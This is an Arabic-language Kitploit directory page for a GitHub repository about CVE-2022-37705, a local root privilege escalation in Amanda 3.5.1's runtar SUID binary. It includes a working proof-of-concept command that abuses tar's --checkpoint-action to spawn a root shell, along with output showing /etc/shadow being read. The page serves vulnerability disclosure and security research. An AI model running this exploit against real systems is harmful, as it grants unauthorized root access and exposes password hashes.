Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-37705 — Amanda 3.5.1 ثاني LPE. | Kitploit
أدوات/GitHubGitHub/maherazzouzi/cve-2022-37705
تصعيد الامتيازاتالتحليل الثابتتحليل الثغرات الأمنيةتحليل الكودالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubmaherazzouzi/cve-2022-37705

CVE-2022-37705

Amanda 3.5.1 ثاني LPE.

عرض المستودع
31منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[الوصف المقترح] تم العثور على ثغرة تصعيد صلاحيات في Amanda 3.5.1 يمكن أن ترفع صلاحيات مستخدم النسخ الاحتياطي إلى صلاحيات الجذر. المكوّن الضعيف هو runtar SUID وهو مجرد غلاف لتشغيل /usr/bin/tar مع وسائط محددة يمكن للمهاجم التحكم بها. لا يتحقق البرنامج بشكل صحيح من الوسائط الممررة إلى ثنائي tar (يفترض أن جميع الوسائط يجب أن تكون بهذا الشكل --ARG VALUE لكن يمكننا توفير --ARG=VALUE كوسيطة واحدة).


[معلومات إضافية] يمكن استخدام هذا الخلل لتنفيذ الأكواد، وحجب الخدمة، وتصعيد الصلاحيات، وكشف المعلومات. هذا هو إثبات المفهوم (PoC) لاستغلاله والحصول على قشرة جذر: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)

backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied

backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names

head /etc/shadow

root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::


[نوع الثغرة: أخرى] فحص الوسائط المعيب.


[بائع المنتج] Amanda


[قاعدة كود المنتج المتأثر] runtar - 3.5.1


[المكوّن المتأثر] الثنائي SUID المتأثر هو: runtar الملف المتأثر هو: runtar.c أسطر الأكواد المتأثرة تبدأ من السطر 162.


[نوع الهجوم] محلي


[تأثير تنفيذ الأكواد] true


[تأثير حجب الخدمة] true


[تأثير تصعيد الصلاحيات] true


[تأثير كشف المعلومات] true


[متجهات الهجوم] لاستغلال الثنائي، عليك فقط تمرير وسائط مصممة بعناية إلى ثنائي runtar SUID لتصعيد الصلاحيات إلى الجذر.


[المرجع] http://www.amanda.org/


[مكتشف الثغرة] Maher Azzouzi

استخدم CVE-2022-37705.

تنزيل الأداة